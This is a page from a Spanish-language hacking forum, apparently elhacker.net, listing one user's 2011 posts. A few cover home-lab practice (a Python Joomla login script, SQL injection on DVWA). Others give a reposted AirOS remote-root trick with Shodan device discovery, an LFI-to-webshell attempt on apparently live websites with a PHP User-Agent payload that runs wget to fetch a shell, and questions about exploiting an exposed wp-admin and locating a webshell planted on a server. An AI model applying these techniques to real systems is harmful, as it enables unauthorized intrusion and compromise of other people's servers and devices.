elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


  Mostrar Temas
Páginas: 1 [2] 3 4 5
11  Programación / Scripting / HTTPBasicAuthHandler() me tiene loco en: 3 Enero 2012, 19:42 pm
Estoy aprendiendo Python, y necesito ayuda. Tengo este código:

Código:
#!/usr/bin/python

import urllib2, urllib, os
 
 
auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password(realm=''  uri='http://192.168.56.101/Joomla_1.5.20-Spanish-pack_completo/administrator/', user='admin',   passwd='123456')

opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)

respuesta = urllib2.urlopen('http://192.168.56.101/Joomla_1.5.20-Spanish-pack_completo/administrator/')

os.system("firefox http://192.168.56.101/Joomla_1.5.20-Spanish-pack_completo/administrator/index.php")

siguiendo esta guía: 20.6. urllib2 ? extensible library for opening URLs — Python v2.7.2 documentation

Pero algo estoy haciendo mal, porque no obtengo los resultados deseados.

El objetivo de este programa es pasar los datos user y pass de la autentificacion de administrador joomla, que tengo en mi pequeño laboratorio de casa, y que esta me abra una nueva ventana con la pantalla del panel de control, osea, con el admin ya identificado.

para esta parte uso:

Código:
import os
 
os.system("firefox www.google.com")

como cambio google por la url que necesito

http://192.168.56.101/Joomla_1.5.20-Spanish-pack_completo/administrator/index.php

este es el fallo que me devuelve:

Citar
ruben@coyote:~/UBNT$ ./boa.py
  File "./boa.py", line 7
    auth_handler.add_password(realm=''  uri='http://192.168.56.101/Joomla_1.5.20-Spanish-pack_completo/administrator/', user='admin',   passwd='123456')
                                                          ^
SyntaxError: invalid syntax

NOTA: la "^" en el mensaje original, esta situada debajo de la "i" de "uri="
12  Foros Generales / Noticias / 0day en AirOS (Acceso como Root) en: 28 Diciembre 2011, 19:58 pm
0day en AirOS (Acceso como Root)

Citar
AirOS remote root 0day

since some genius decided to write worm for this, here is early santa for you, kids:

1. http://www.shodanhq.com/search?q=airos
2. click arbitrary system
3. change http://X.X.X.X/login.cgi?uri=/ to http://X.X.X.X/admin.cgi/sd.css
4. profit?

IRCNet opers: expect some decent KNB bot mayhem for a while :)

AirOS creado por Ubiquiti se basa en un sistema operativo avanzado capaz de manejar un poderoso sistema inalámbrico y funciones de enrutamiento, desarrollado con una interfaz de usuario simple, limpia e intuitiva (a diferencia con otros sistemas).

trae por defecto de fabrica: Usuario: ubnt y Contraseña: ubnt

http://www.airos.com/descargas/manuales/guideAirosLinux.pdf
http://wireless.orosal.es/ubnt/manual_ps2_ns2.pdf

fuente:http://www.blackploit.com/
13  Seguridad Informática / Hacking / sqli en dvwa en: 26 Diciembre 2011, 01:40 am
dvwa = http://www.dvwa.co.uk/

una aplicación vulnerable, con todo tipo de fallas para que juguemos



aquí muestro como hacer sqli con sqlmap usando la opción cookie
14  Seguridad Informática / Nivel Web / ayuda con LFI en: 11 Diciembre 2011, 23:27 pm
Tengo un par de web que son vulnerables a LFI. Puedo ver varios archivos como:

Citar

pero no puede ver

etc/self/environ

porque?

En otra web que si puedo verlo:

Citar
DOCUMENT_ROOT=/home/*********/public_html�GATEWAY_INTERFACE=CGI/1.1�HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8�HTTP_ACCEPT_CHARSET=TIS-620,utf-8;q=0.7,*;q=0.7�HTTP_ACCEPT_ENCODING=gzip,deflate�HTTP_ACCEPT_LANGUAGE=en-us,en;q=0.5�HTTP_CONNECTION=keep-alive�HTTP_HOST=www.***************.com.pt�HTTP_KEEP_ALIVE=115�HTTP_USER_AGENT=AQUI DEBE IR LA SHELL�PATH=/bin:/usr/bin�QUERY_STRING=content=*******/*******.php/../../../../../../proc/self/environ�REDIRECT_STATUS=200�REMOTE_ADDR=***.***.***.***�REMOTE_PORT=47433�REQUEST_METHOD=GET�REQUEST_URI=/*****.php?**********=***/*****.php/../../../../../../proc/self/environ�SCRIPT_FILENAME=/home/******/public_html/index.php�SCRIPT_NAME=/index.php�SERVER_ADDR=***.***.***.***�SERVER_ADMIN=webmaster@**********.com.**�SERVER_NAME=www.***********.com.**�SERVER_PORT=80�SERVER_PROTOCOL=HTTP/1.1�SERVER_SIGNATURE=�
SERVER_SOFTWARE=Apache�UNIQUE_ID=**************_****�

cuando sustituyo el campo USER-AGENT con live http header, para subir una webshell

Código:
<?system ('wget http://rutadeunawebshell.com/shell.txt -o shell.php');?>

esta opcion me aparece vacia an la ventana del firefox, y cuando trato de ir a la webshell, no esta.

Citar
Not Found

The requested URL /shell.php was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

Alguien puede explicarme el porque?
estoy haciendo algo mal? (aparte de lo obvio)
15  Seguridad Informática / Hacking Wireless / #breaking80211 en: 7 Diciembre 2011, 23:11 pm
--- Contenido ---
  • Introducción
  • Materiales/Herramientas utilizados
  • Conceptos básicos
  • [-] Cambiar dirección MAC
    [-] Modo monitor

  • Cifrado WEP
  • [-] Ataque 1+3
    [-] Ataque Chop Chop
    [-] Ataque fragmentación
    [-] Hirte Attack
    [-] Caffe Late Attack

  • Cifrado WPA
  • [-] Obteniendo el handshake
    [-] Obteniendo la contraseña: Aircrack-ng
    [-] Obteniendo la contraseña: coWPAtty
    [-] Obteniendo la contraseña: Pyrit
    [-] Obteniendo la contraseña: Rainbow Tables
    [-] Rainbow Tables -> coWPAtty
    [-] Rainbow Tables -> Pyrit

  • Otras defensas
  • [-] Filtrado MAC
    [-] Ataque de desasociación
    [-] ESSID oculto

  • Descifrar capturas
  • [-] Airdecap-ng + WEP
    [-] Airdecap-ng + WPA

  • Ataques sociales -- Creación de puntos de acceso
  • [-] Airbase-ng + brctl
    [-] Airbase-ng + iptables

  • Ataque sociales -- Ataques en LAN
  • [-] DNS-spoofing con Ettercap y Metasploit
    [-] S.E.T.

  • Ataques sociales -- Todo en uno
  • [-] Karmetasploit

  • Documentación
Citar

fuente:http://0verl0ad.blogspot.com/
16  Seguridad Informática / Seguridad / tengo las pass, busco user en: 6 Diciembre 2011, 15:33 pm
1. generé el HASH en md5 una pass que nos queramos, me explico, desde http://md5crack.com/ por ejemplo, generamos un hash en md5, supongamos "123456" da como resultado "e10adc3949ba59abbe56e057f20f883e"

2. en nuestro buscador preferido buscamos los archivo con extensión php que contengan nuestro md5. Esto seria asi: "e10adc3949ba59abbe56e057f20f883e" filetype:php

17  Seguridad Informática / Nivel Web / carpeta wp-admin al descubierto. en: 21 Noviembre 2011, 22:55 pm
Un saludo a todos.

Tengo acceso a una carpeta ../wp-admin/ de una web, como puedo aprovechar esta mala configuración?
Supongo que  de algo servirá, pues puedo ver la mayoría de los .php (setting, users, admin, theme, ....)

Tengo que avisar que ando junto de php, aunque algo entiendo :-)
18  Seguridad Informática / Nivel Web / webshell inyectada, pero no la encuentro en: 19 Noviembre 2011, 13:53 pm
Tengo acceso a un servidor en el que puedo subir una webshell, pero una vez subida no la encuentro, he probado nikto y dirbuster.

Alguien puede ayudarme? la idea es crear un videotuto
19  Foros Generales / Dudas Generales / posible falla???? en: 31 Octubre 2011, 19:34 pm
Tengo una duda sobre un posible fallo en una web.
El caso es que trasteando, cuando modificas la url, de esta manera

www.XXXXXXXX.com/asdf

me devuelve la pagina mal cargada, con este error:

Citar
An error occurred
Page not found
Exception information:

Message: Invalid controller specified (asdf)
Stack trace:

#0 /var/www/vhosts/XXXXXXXX.com/httpdocs/library/Zend/Controller/Front.php(954): Zend_Controller_Dispatcher_Standard->dispatch(Object(Zend_Controller_Request_Http), Object(Zend_Controller_Response_Http))
#1 /var/www/vhosts/XXXXXXXX.com/httpdocs/library/Zend/Application/Bootstrap/Bootstrap.php(97): Zend_Controller_Front->dispatch()
#2 /var/www/vhosts/XXXXXXXXX.com/httpdocs/library/Zend/Application.php(366): Zend_Application_Bootstrap_Bootstrap->run()
#3 /var/www/vhosts/XXXXXXXX.com/httpdocs/index.php(71): Zend_Application->run()
#4 {main} 

Request Parameters:

array (
  'controller' => 'asdf',
  'action' => 'index',
  'module' => 'default',


La pregunta es si alguien sabe, si esto es una falla explotable?
20  Foros Generales / Foro Libre / herramientas muy utiles en: 8 Octubre 2011, 21:57 pm
no siempre se pide, tambien se da, asi que un regalo para todos.
lo encontre en "pastebin"

Citar
Páginas: 1 [2] 3 4 5
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines